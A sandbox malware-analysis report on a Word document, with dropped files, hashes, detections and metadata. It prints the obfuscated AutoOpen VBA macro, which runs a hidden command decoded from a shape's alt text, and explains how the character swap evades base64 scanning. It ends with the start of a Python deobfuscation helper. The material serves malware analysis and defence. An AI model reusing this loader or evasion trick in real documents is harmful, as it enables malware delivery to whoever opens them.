SHA1: E7653365649AA3DDEE4A05A9298FBD05CC72212D
SHA-256: FB228D6FCF54CAFC494C8AF1162CB709422FADAB5A4A6FC2749D3FFD6F25131D
SHA-512: BE54D01E73B63DFAF3B70DB589FC11D1E650BC708ABD6EC938E00F0D620D2DDB258F6929E83DF323F75ABC54BCC61B5F25135DAFCAA2CA756DD929530D4E2608
Malicious: false
Reputation: low
            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A9C4933D.wmf
Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type: Targa image data - Map - RLE 28 x 65536 x 0 +7 "\004"
Category: dropped
Size (bytes): 730
Entropy (8bit): 3.098760582869104
Encrypted: false
SSDEEP: 12:MBZp0zSnM+vdd81lH8q0QqKmSuWnTd9WsXAnfexozOKSwMfiTQMfiTPPPEzG1lH9:A0zP+vddqqKm3WnXZXAnufiT7fiTYbF2
MD5: 8240B44F053C5ED87915946D7B08BC56
SHA1: E7653365649AA3DDEE4A05A9298FBD05CC72212D
SHA-256: FB228D6FCF54CAFC494C8AF1162CB709422FADAB5A4A6FC2749D3FFD6F25131D
SHA-512: BE54D01E73B63DFAF3B70DB589FC11D1E650BC708ABD6EC938E00F0D620D2DDB258F6929E83DF323F75ABC54BCC61B5F25135DAFCAA2CA756DD929530D4E2608
Malicious: false
Reputation: low
            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C7B48861.wmf
Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type: Targa image data - Map - RLE 28 x 65536 x 0 +7 "\004"
Category: dropped
Size (bytes): 730
Entropy (8bit): 3.098760582869104
Encrypted: false
SSDEEP: 12:MBZp0zSnM+vdd81lH8q0QqKmSuWnTd9WsXAnfexozOKSwMfiTQMfiTPPPEzG1lH9:A0zP+vddqqKm3WnXZXAnufiT7fiTYbF2
MD5: 8240B44F053C5ED87915946D7B08BC56
SHA1: E7653365649AA3DDEE4A05A9298FBD05CC72212D
SHA-256: FB228D6FCF54CAFC494C8AF1162CB709422FADAB5A4A6FC2749D3FFD6F25131D
SHA-512: BE54D01E73B63DFAF3B70DB589FC11D1E650BC708ABD6EC938E00F0D620D2DDB258F6929E83DF323F75ABC54BCC61B5F25135DAFCAA2CA756DD929530D4E2608
Malicious: false
Reputation: low
            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{DF4B264E-30B7-41FF-92E6-96F7D248F773}.tmp
Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type: Composite Document File V2 Document, Cannot read section info
Category: dropped
Size (bytes): 20480
Entropy (8bit): 5.4273016557470175
Encrypted: false
SSDEEP: 384:ntho8YySVCAnhthCiNZFOrMGQ63BpM0ju3zpedAbT:Ijv9TDdU6V3Fed
MD5: 93395C28C017486305A27249546947C8
SHA1: 9A1D5246CDADBFC80E3205C94238FA9EB2F9DE62
SHA-256: 3212515E43157EB5A77AE5F053C0649112ACB4A6871BD82A1B41C8B07DF272B8
SHA-512: DD5CCED96AA3708666D917B9D3276EDEFBC6590CF19D0545D87C084A53BE8E3852AE2EB0613A8819AB8391BA47936806009F596D036A636ED5C64089A8B8392C
Malicious: false
Reputation: low
            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{A519487F-70CA-4082-9E8E-8709DA5961D7}.tmp
Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type: data
Category: dropped
Size (bytes): 1024
Entropy (8bit): 0.05390218305374581
Encrypted: false
SSDEEP: 3:ol3lYdn:4Wn
MD5: 5D4D94EE7E06BBB0AF9584119797B23A
SHA1: DBB111419C704F116EFA8E72471DD83E86E49677
SHA-256: 4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
SHA-512: 95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
Malicious: false
Reputation: high, very likely benign file
            C:\Users\user\AppData\Local\Temp\~DF527BC4B1A394C70E.TMP
Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type: Composite Document File V2 Document, Cannot read section info
Category: dropped
Size (bytes): 64000
Entropy (8bit): 4.9674079732142165
Encrypted: false
SSDEEP: 1536:p3JvxrOgpYPJ6EusMo42gZaFIZwGfa41:pf6gpYPJ6Eeo42gQImGfa
MD5: 995A8E6E4254C7F5891732F50F3C9CC4
SHA1: D29B43C35E29ECC9AE7705FA9058F3BDB4831781
SHA-256: DAEFC03F4F25AA537EBEC961A03D35AD39C0065C15BA5DB608189232BC092EB8
SHA-512: 8DCAF0DC8F42964EFD3ED98FD17AAC75C188DA389275643A5F8311A9DF9F8BAC1B798CAD981E03BB5C84F306CC6C388A0662C1E3F94F1C4E210EA0B7EA583776
Malicious: true
Yara Hits:
• Rule: SUSP_VBA_FileSystem_Access, Description: Detects suspicious VBA that writes to disk and is activated on document open, Source: C:\Users\user\AppData\Local\Temp\~DF527BC4B1A394C70E.TMP, Author: Florian Roth
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
Reputation: low
            C:\Users\user\AppData\Local\Temp\~DFDEFC6369C94FD53E.TMP
Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type: data
Category: dropped
Size (bytes): 512
Entropy (8bit): 0.0
Encrypted: false
SSDEEP: 3::
MD5: BF619EAC0CDF3F68D496EA9344137E8B
SHA1: 5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256: 076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512: DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious: false
            C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\attacker1.LNK
Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type: MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon Aug 30 20:08:53 2021, mtime=Mon Aug 30 20:08:53 2021, atime=Sat Nov 13 03:55:10 2021, length=83968, window=hide
Category: dropped
Size (bytes): 1009
Entropy (8bit): 4.522204860308124
Encrypted: false
SSDEEP: 12:8JsFRgXg/XAlCPCHaX6zBFB/z+X+WQaiAeStKicvbr80L8GAeiDtZ3YilMMEpxRE:8c/XTKz3cqvzSrev80LhziDv3qVQd7Qy
MD5: D67F2D007362909E5C9E76278F405DF0
SHA1: 6AF097168EB235BE02DD5EF9284584F68F4154D3
SHA-256: 43A527AE14FA391F5F5FD60FC20BC3B89F3EC0508BA802A87288FEC3043F941B
SHA-512: 9E1B751F5510B71A0E137891A3D37F556BC258CF2ACFE62700E21698257991DCAEFE94934EAB0848AA12AD622AAA227B983766F1FCA1D9EAD79CA6DAD72397E4
Malicious: false
            C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 69
Entropy (8bit): 4.484070798959447
Encrypted: false
SSDEEP: 3:bDuMJlcRiFUmX1cCUv:bCBiFoC2
MD5: 17DE220ED3D745D01A065BA9976BDD3B
SHA1: 2E601379DD5BCFBCA3679BCA4C391870B52D502A
SHA-256: 1086157EF52702C3F737A70C773E9326E3BBF1BC7146A738EB864F5E6D9DA5BF
SHA-512: FBA3690C7C475953C18DBC2A397849030762C67624B54D73E142B8B18DD77FB4F74DE3FDF41DE2D38F231EF16F1834F21DBF008EFE334A07E8BFC84527CC7E3E
Malicious: false
            Preview: [folders]..Templates.LNK=0..attacker1.LNK=0..[doc]..attacker1.LNK=0..
            C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type: data
Category: dropped
Size (bytes): 162
Entropy (8bit): 2.5038355507075254
Encrypted: false
SSDEEP: 3:vrJlaCkWtVySyUAyYHG/mWHbilleeKbylln:vdsCkWtUUAyYWclXAyll
MD5: 2055FB0A31E9559840C6AB84D1A668A0
SHA1: C8A61DFF9D6A04E6D2B20499F735331109AC0574
SHA-256: 8805175F707B3D45FB66A9C44FB935C615193283D8A79D29DEA91A91C9A897D2
SHA-512: CC2424DC238463163C451DA73D04C9DF8E185A8A853E9B52CFB5E615C65EBAB992A58F5FEF80509ACD0A85D40FE9918F74A43C31DD7D0836B56BC93BD7265AE8
Malicious: false
            Preview: .user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
            C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msar (copy)
            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            File Type:data
            Category:dropped
            Size (bytes):8016
            Entropy (8bit):3.5814416306637633
            Encrypted:false
            SSDEEP:96:chQCsMqoqvsqvJCwoHz8hQCsMqoqvsEHyqvJCwor1zeoYVHQF2DNlUVxA2:cyZoHz8yRHnor1zeaF2DIA2
            MD5:10E0FE0DB4EE96DC449E5E36060B824B
            SHA1:CC04006D6BE1A0C76649F787A1608A7818F3B1FF
            SHA-256:7652157FEC78290CE35D5FF3935721739D7AE2FFE6AD407C69282D79CD18B448
            SHA-512:D6F623FCAE3BBEFCF13861B291E11DB776C26C4682E64886640352316F57CEF210F1CE50E6D8981EE47EBF2A4E9DEEC8DD12096FCB234E4A4352796AA59D8910
            Malicious:false
            Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
            C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\BCD8CNWOD0D3BPNFLWKK.temp
            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            File Type:data
            Category:dropped
            Size (bytes):8016
            Entropy (8bit):3.5814416306637633
            Encrypted:false
            SSDEEP:96:chQCsMqoqvsqvJCwoHz8hQCsMqoqvsEHyqvJCwor1zeoYVHQF2DNlUVxA2:cyZoHz8yRHnor1zeaF2DIA2
            MD5:10E0FE0DB4EE96DC449E5E36060B824B
            SHA1:CC04006D6BE1A0C76649F787A1608A7818F3B1FF
            SHA-256:7652157FEC78290CE35D5FF3935721739D7AE2FFE6AD407C69282D79CD18B448
            SHA-512:D6F623FCAE3BBEFCF13861B291E11DB776C26C4682E64886640352316F57CEF210F1CE50E6D8981EE47EBF2A4E9DEEC8DD12096FCB234E4A4352796AA59D8910
            Malicious:false
            Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
            C:\Users\user\Desktop\~$tacker1.doc
            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            File Type:data
            Category:dropped
            Size (bytes):162
            Entropy (8bit):2.5038355507075254
            Encrypted:false
            SSDEEP:3:vrJlaCkWtVySyUAyYHG/mWHbilleeKbylln:vdsCkWtUUAyYWclXAyll
            MD5:2055FB0A31E9559840C6AB84D1A668A0
            SHA1:C8A61DFF9D6A04E6D2B20499F735331109AC0574
            SHA-256:8805175F707B3D45FB66A9C44FB935C615193283D8A79D29DEA91A91C9A897D2
            SHA-512:CC2424DC238463163C451DA73D04C9DF8E185A8A853E9B52CFB5E615C65EBAB992A58F5FEF80509ACD0A85D40FE9918F74A43C31DD7D0836B56BC93BD7265AE8
            Malicious:false
            Preview: .user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

            Static File Info

            General

            File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Title: Networked multi-state projection, Subject: West Virginia Samanta, Author: 213-446-1757 x7135, Comments: Re-contextualized radical service-desk, Template: Normal, Last Saved By: Windows, Revision Number: 11, Name of Creating Application: Microsoft Office Word, Total Editing Time: 03:00, Create Time/Date: Thu Apr 19 19:59:00 2018, Last Saved Time/Date: Thu Feb 7 23:45:00 2019, Number of Pages: 1, Number of Words: 1, Number of Characters: 7, Security: 0
            Entropy (8bit):6.056002245997666
            TrID:
            • Microsoft Word document (32009/1) 54.23%
            • Microsoft Word document (old ver.) (19008/1) 32.20%
            • Generic OLE2 / Multistream Compound File (8008/1) 13.57%
            File name:attacker1.doc
            File size:82944
            MD5:4443840f2870c2cd55062bdcab07e5fd
            SHA1:61911e604362338b0f9c91c4aa69696a88dad62f
            SHA256:2979b5fbb454e2f13d89e58177f8c1f881bd3f0a0bebb1d27da9e189ba9d284e
            SHA512:0ce9ab3c81602bdc59baba724d14703e7fa834125e536e5c88b0cc11fd614fa481d8fb4b391138d436ee950bf0dd0e46124d58f1bec834ddd88925812f4c2e68
            SSDEEP:768:vLaJfu4aLDbyWwFlPpKAEJgkYN3yp7TFphXxNRhFShIxSXhJIGhFvhV9JoTBfDTc:vZPbydDpOKyps4BfDT30jvxz
            File Content Preview:........................>.......................w...........z...............v..................................................................................................................................................................................

            File Icon

            Icon Hash:e4eea2aaa4b4b4a4

            Static OLE Info

            General

            Document Type:OLE
            Number of OLE Files:1

            OLE File "attacker1.doc"

            Indicators

            Has Summary Info:True
            Application Name:Microsoft Office Word
            Encrypted Document:False
            Contains Word Document Stream:True
            Contains Workbook/Book Stream:False
            Contains PowerPoint Document Stream:False
            Contains Visio Document Stream:False
            Contains ObjectPool Stream:
            Flash Objects Count:
            Contains VBA Macros:True

            Summary

            Code Page:1251
            Title:Networked multi-state projection
            Subject:West Virginia Samanta
            Author:213-446-1757 x7135
            Keywords:
            Comments:Re-contextualized radical service-desk
            Template:Normal
            Last Saved By:Windows
            Revision Number:11
            Total Edit Time:180
            Create Time:2018-04-19 18:59:00
            Last Saved Time:2019-02-07 23:45:00
            Number of Pages:1
            Number of Words:1
            Number of Characters:7
            Creating Application:Microsoft Office Word
            Security:0

            Document Summary

            Document Code Page:1251
            Number of Bytes:23552
            Number of Lines:1
            Number of Paragraphs:1
            Thumbnail Scaling Desired:False
            Manager:Mr. Granville McGlynn
            Company:Grady-Adams Rusty McGlynn
            Contains Dirty Links:False
            Shared Document:False
            Changed Hyperlinks:False
            Application Version:1048576

            Streams with VBA

            VBA File Name: ThisDocument.cls, Stream Size: 9852
            General
            Stream Path:Macros/VBA/ThisDocument
            VBA File Name:ThisDocument.cls
            Stream Size:9852
            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
            Data Raw:01 16 03 00 00 f0 00 00 00 04 03 00 00 d4 00 00 00 da 01 00 00 ff ff ff ff 0b 03 00 00 e7 16 00 00 00 00 00 00 01 00 00 00 06 53 da b7 00 00 ff ff a3 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
            VBA Code
            Attribute VB_Name = "ThisDocument"
            Attribute VB_Base = "1Normal.ThisDocument"
            Attribute VB_GlobalNameSpace = False
            Attribute VB_Creatable = False
            Attribute VB_PredeclaredId = True
            Attribute VB_Exposed = True
            Attribute VB_TemplateDerived = True
            Attribute VB_Customizable = True
            Sub AutoOpen()
            On Error Resume Next
            DBvbDlfxWGXm = WifblkBfDS + CBool(2243) + Len(ChrW(5 + 9) + ChrW(3)) + LenB(Trim("QHSiqJpWNfHbmnlvPbbP")) + Len(lZlRjJlQKnBntw)
            lQbWzTrJtfhGiaS = pWNDRZbLZdGgl + CBool(5015) + Len(ChrW(1 + 1) + ChrW(2)) + LenB(Trim("XkBMzwHsSZswNPQMBDL")) + Len(SxZnBTiJkRBD)
            
            tcZwqHFss = zTQlVkgJtJHVH + CBool(6903) + Len(ChrW(6 + 4) + ChrW(10)) + LenB(Trim("jDxtDndtrsCpNSNkxdJzhj")) + Len(RRdTnGKKsvm)
            
            qDRjdabdvLvw = bDhgcvpVdcXNV + CBool(6163) + Len(ChrW(2 + 7) + ChrW(10)) + LenB(Trim("TisXGlccaikddjLpXZhn")) + Len(hVXaKsWdqGRalHZ)
            
            TJgSBgQcFDq = xHtTibzqdL + CBool(6499) + Len(ChrW(2 + 7) + ChrW(1)) + LenB(Trim("iFvxjMCgcVJTWgGHG")) + Len(aQkXvbNzGWvh)
            GWGjfdpJrxkg = PfFKPmwSmLwNT + CBool(2009) + Len(ChrW(4 + 7) + ChrW(6)) + LenB(Trim("kdHfDqVfHbpXcWBalpBj")) + Len(jwrLSVvTGmNgSNh)
               CCvSPPJWbrLcHS = ""
            
            fhjjZvgrrjq = mFGCJxVWBXjkl + CBool(1344) + Len(ChrW(8 + 10) + ChrW(3)) + LenB(Trim("bTZapLhFkwRKZPK")) + Len(SWsFlrFhBaHlgGg)
               rjvFRbqzLtkzn = "" + ""
            
            GnxslaCGaT = qqmRcwgpqlk + CBool(6041) + Len(ChrW(1 + 2) + ChrW(7)) + LenB(Trim("FvacXVVTqjKJxgdZjv")) + Len(QdRJwGnCHinZ)
            xDgzRpPhghWrJL = NfHHmGCha + CBool(347) + Len(ChrW(3 + 10) + ChrW(10)) + LenB(Trim("QRgSjBfjthjpDkPxVpmDlb")) + Len(jWwMxvjadBtl)
            
            
            tTRXtXmcgPrktFh = jdmzHVMkcVXcdMP + CBool(5783) + Len(ChrW(2 + 10) + ChrW(10)) + LenB(Trim("rnkhGPWpTBpGNcVlk")) + Len(irVHvSQQvHtd)
            
            
            GhFdPWgpiqRj = CNLqTtpWDztqK + CBool(8793) + Len(ChrW(1 + 8) + ChrW(9)) + LenB(Trim("SXNhbQpQzmwVQlTmR")) + Len(RJaDmljLvpgjz)
            
            
            
            LbZlvNQVaFtMi = vxPLFqFShhCqh + CBool(6141) + Len(ChrW(6 + 10) + ChrW(3)) + LenB(Trim("HahDZGNRJvHTcDKWPnnl")) + Len(zzfDDCMbPXrM)
            
               SKKdjMpgJRQRK = "" + "" + Trim("")
            
            ppBLnCMSjnSV = fPSQKCwZHRJ + CBool(6767) + Len(ChrW(6 + 9) + ChrW(3)) + LenB(Trim("cwZGhscSkqdkCDrjXnTS")) + Len(dmfMtsadBraSX)
            
            
            pzSpxTNqbhCwW = DVsGkQJsLPQCcZqt + CBool(1865) + Len(ChrW(2 + 8) + ChrW(6)) + LenB(Trim("kZNsfRinpsRKqfNnF")) + Len(laLlSgkFRvtad)
            JtnpWHTxSiiz = aCwfgTJDmbRQW + CBool(6925) + Len(ChrW(9 + 10) + ChrW(2)) + LenB(Trim("dDWBignPNFqBkrjqZlKiT")) + Len(chdsMqJKtKM)
            
            QmrcNWGaSgCWz = lFQtNLhczCraQG + CBool(3980) + Len(ChrW(3 + 8) + ChrW(6)) + LenB(Trim("VKvjZliFSGsfCGKhSf")) + Len(KPgHQGtPqLTjphCn)
               hdNxDVBxCTqQTpB = LTrim("")
            nFtNXRVXbdFr = VPWjviWKBpJi + CBool(7052) + Len(ChrW(4 + 5) + ChrW(8)) + LenB(Trim("VBjjdfMslCcHNgbjJa")) + Len(nBDKwlZJvRMwRR)
            
            gLkHkMNJpWGPiM = qcmPmHlmdWZqj + CBool(194) + Len(ChrW(7 + 5) + ChrW(1)) + LenB(Trim("ZTTXLrVxkWNKjjPrfCj")) + Len(crtmLCNraQLF)
            zMzTwHmjJjndL = rDZKxGvDrNBJ + CBool(3433) + Len(ChrW(7 + 9) + ChrW(1)) + LenB(Trim("XaMLmrHxaSlqSXV")) + Len(ptlCjjDiKZ)
            
            MNKsCVNXktg = hdJScJQgXmkm + CBool(2807) + Len(ChrW(7 + 5) + ChrW(9)) + LenB(Trim("RbRanmjXmLslKkZDlB")) + Len(WfkDLfGhqhWfhTN)
            nHMgbFSzmgv = TBWHlimLMV + CBool(7832) + Len(ChrW(9 + 8) + ChrW(10)) + LenB(Trim("LsHkNQtMsMzltJgPQgfkR")) + Len(JHxRSZaqkRwtHi)
               RJzJQGRzrc = ""
            
            
            MCFxxPbQXmfGfnL = NsLSSSLGDfkwlt + CBool(5937) + Len(ChrW(6 + 9) + ChrW(3)) + LenB(Trim("SNpRVqvVcnPhX")) + Len(gJMqliiHCRNZQTc)
            LdnJwgZjbnKqtaa = aBBZDWsTDPPnS + CBool(8258) + Len(ChrW(7 + 3) + ChrW(4)) + LenB(Trim("faLQCswVKLgWjmJKg")) + Len(KmpHBhFRwlKKMm)
            
            FHvwQsqqdgbr = wtDvZMrVDatsPG + CBool(8557) + Len(ChrW(6 + 1) + ChrW(4)) + LenB(Trim("lDjJcSLdkCqGrRzwdlKHLVHn")) + Len(qlkRQRpBTtrm)
            CiRSdXZHwV = NKxZvdzbPWxxN + CBool(1618) + Len(ChrW(10 + 4) + ChrW(4)) + LenB(Trim("pJRTVfBcDhxrcwKkPDbFt")) + Len(wKPlSJwvvXqW)
            
            
            xVpspwsllZGqG = MpTBwVxXgdanm + CBool(5472) + Len(ChrW(1 + 3) + ChrW(5)) + LenB(Trim("KlilNHcTHfLXgQgkkRH")) + Len(tlWSglqmcgHrcq)
            
               CWflqnrJbKVBj = RTrim("") + ""
            kkCTbdBcJnsGw = sFdLzbirFimt + CBool(6092) + Len(ChrW(6 + 7) + ChrW(8)) + LenB(Trim("cvXVCvgQfdqkdZkQwadmPMg")) + Len(acSnFqKQZJkgq)
            
            cGvRqkvVFLFzsK = mChrRcSmQTlzbtd + CBool(476) + Len(ChrW(5 + 5) + ChrW(9)) + LenB(Trim("iXZiMssZcgzrHZrcFvVtk")) + Len(iixsSRWTqT)
            
            
               
            QwXhZsRSjsaLm = FracTilLgHn + CBool(590) + Len(ChrW(4 + 8) + ChrW(7)) + LenB(Trim("MNhhbMhpCpvcwlCCWRgfhFc")) + Len(igrKGJjKXXfr)
            
               Set pNHbvwXpnbZvS = Shapes(Trim("h9mkae7"))
            dWDHaNGFDcG = iGKRcdzDwMZzqlWN + CBool(2417) + Len(ChrW(5 + 3) + ChrW(4)) + LenB(Trim("hDNlqMjmcDXrwkrDwq")) + Len(mQhXDqaHVLMab)
            zVRvpZVSlZP = jxrRCZTpPSjqG + CBool(747) + Len(ChrW(9 + 2) + ChrW(3)) + LenB(Trim("wnkLGNvnwtBPGKxVMs")) + Len(HmbfaFbBPKWJstpW)
            
               VBA.Shell# "CmD /C " + Trim(rjvFRbqzLtkzn) + SKKdjMpgJRQRK + Trim(Replace(pNHbvwXpnbZvS.AlternativeText + "", "[", "A")) + hdNxDVBxCTqQTpB + RJzJQGRzrc + CWflqnrJbKVBj, CInt(351 * 2 + -702)
            lFbSwGcXvLj = ZcCmWkkqqB + CBool(3868) + Len(ChrW(10 + 10) + ChrW(7)) + LenB(Trim("GpsfXGHdXPiPBQWm")) + Len(CxtsBzHdKBGmb)
            gQVFVamfZLZ = GgRgBdCqvLXk + CBool(260) + Len(ChrW(4 + 5) + ChrW(3)) + LenB(Trim("pSdvPiVsNHZWVbr")) + Len(ZxkaZVpVviNG)
               
            
            XXDBdSGLmXrT = kkfQTPTJpjjs + CBool(9051) + Len(ChrW(4 + 6) + ChrW(1)) + LenB(Trim("RkTPBgXDhBTgMXtKSb")) + Len(bvfFxpHJWlX)
            
            rhfWlBhJNxhXd = DbfBblNVjZrSd + CBool(7064) + Len(ChrW(10 + 10) + ChrW(6)) + LenB(Trim("MwstcPJvhangVNZapdZ")) + Len(jfPdPngPqkfl)
            PrBtRSHfsVF = PDvGhnzPcxhD + CBool(1483) + Len(ChrW(5 + 8) + ChrW(1)) + LenB(Trim("tvjtZQfzHdgNNRHZqilSN")) + Len(JJLiShTtqxhXr)
            
            
            
            
            fXsWigQMrcFc = mxpJbmSSQ + CBool(5222) + Len(ChrW(10 + 8) + ChrW(10)) + LenB(Trim("rdlmccJkfVhXRccQBM")) + Len(RkVtwCRbFKwknG)
            dgDaZRkBlQp = MvZcVWwwaGt + CBool(5297) + Len(ChrW(4 + 6) + ChrW(5)) + LenB(Trim("VgBdpkxSLXdGbgLKh")) + Len(qNJnfcLpkQXcp)
            
            wdTqKxXzraCs = mkaDKJfCfVRm + CBool(8379) + Len(ChrW(1 + 10) + ChrW(5)) + LenB(Trim("klTWfaFrtslwGtgadMj")) + Len(GvivfXcsHC)
            
            
            
            
            End Sub
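
The routine above is almost entirely padding. Every line of the form `x = y + CBool(n) + Len(ChrW(a + b) + ChrW(c)) + LenB(Trim("...")) + Len(z)` assigns a number that is never read again, and the string variables concatenated into the Shell call (rjvFRbqzLtkzn, SKKdjMpgJRQRK, hdNxDVBxCTqQTpB, RJzJQGRzrc, CWflqnrJbKVBj) are all empty. What is left is a small loader: AutoOpen runs on document open, On Error Resume Next swallows failures, the shape named h9mkae7 is looked up, every "[" in that shape's AlternativeText is replaced with "A", and the result is run as "CmD /C ..." through VBA.Shell with window style CInt(351 * 2 + -702), which evaluates to 0 (vbHide). The Replace is the only decoding step, and it targets the letter "A" because the base64 of a UTF-16LE PowerShell -EncodedCommand contains many "A" characters (the zero high bytes of ASCII text), so storing the text without them defeats naive base64 scanning of the document. The Python below is an added triage helper and is not part of the sandbox report: it drops the padding lines, emulates the command reconstruction, and decodes the encoded command. The shape's AlternativeText is not shown in the report, so SAMPLE_ALT_TEXT is a constructed stand-in built from a harmless command; BENIGN_COMMAND, ENC_ARG and all function names are my own.

```python
from __future__ import annotations

import base64
import re

# Excerpt of the AutoOpen macro shown in the report.  Three of the padding
# lines are kept so strip_junk() has something to remove.
MACRO_EXCERPT = r'''
Sub AutoOpen()
On Error Resume Next
DBvbDlfxWGXm = WifblkBfDS + CBool(2243) + Len(ChrW(5 + 9) + ChrW(3)) + LenB(Trim("QHSiqJpWNfHbmnlvPbbP")) + Len(lZlRjJlQKnBntw)
   rjvFRbqzLtkzn = "" + ""
QwXhZsRSjsaLm = FracTilLgHn + CBool(590) + Len(ChrW(4 + 8) + ChrW(7)) + LenB(Trim("MNhhbMhpCpvcwlCCWRgfhFc")) + Len(igrKGJjKXXfr)
   Set pNHbvwXpnbZvS = Shapes(Trim("h9mkae7"))
   VBA.Shell# "CmD /C " + Trim(rjvFRbqzLtkzn) + SKKdjMpgJRQRK + Trim(Replace(pNHbvwXpnbZvS.AlternativeText + "", "[", "A")) + hdNxDVBxCTqQTpB + RJzJQGRzrc + CWflqnrJbKVBj, CInt(351 * 2 + -702)
lFbSwGcXvLj = ZcCmWkkqqB + CBool(3868) + Len(ChrW(10 + 10) + ChrW(7)) + LenB(Trim("GpsfXGHdXPiPBQWm")) + Len(CxtsBzHdKBGmb)
End Sub
'''

# Every padding statement has the shape
#   <var> = <undeclared var> + CBool(<n>) + ... + Len(<undeclared var>)
# Undeclared variables are Empty, so the expression is just a number that
# nothing ever reads.  The pattern deliberately does not match the
# "" + "" assignments, the Set, or the VBA.Shell call.
JUNK_LINE = re.compile(r'^\s*\w+\s*=\s*\w+\s*\+\s*CBool\(\d+\).*\+\s*Len\(\w+\)\s*$')


def strip_junk(vba: str) -> list[str]:
    """Return the non-blank macro lines that are not padding."""
    return [ln.strip() for ln in vba.splitlines()
            if ln.strip() and not JUNK_LINE.match(ln)]


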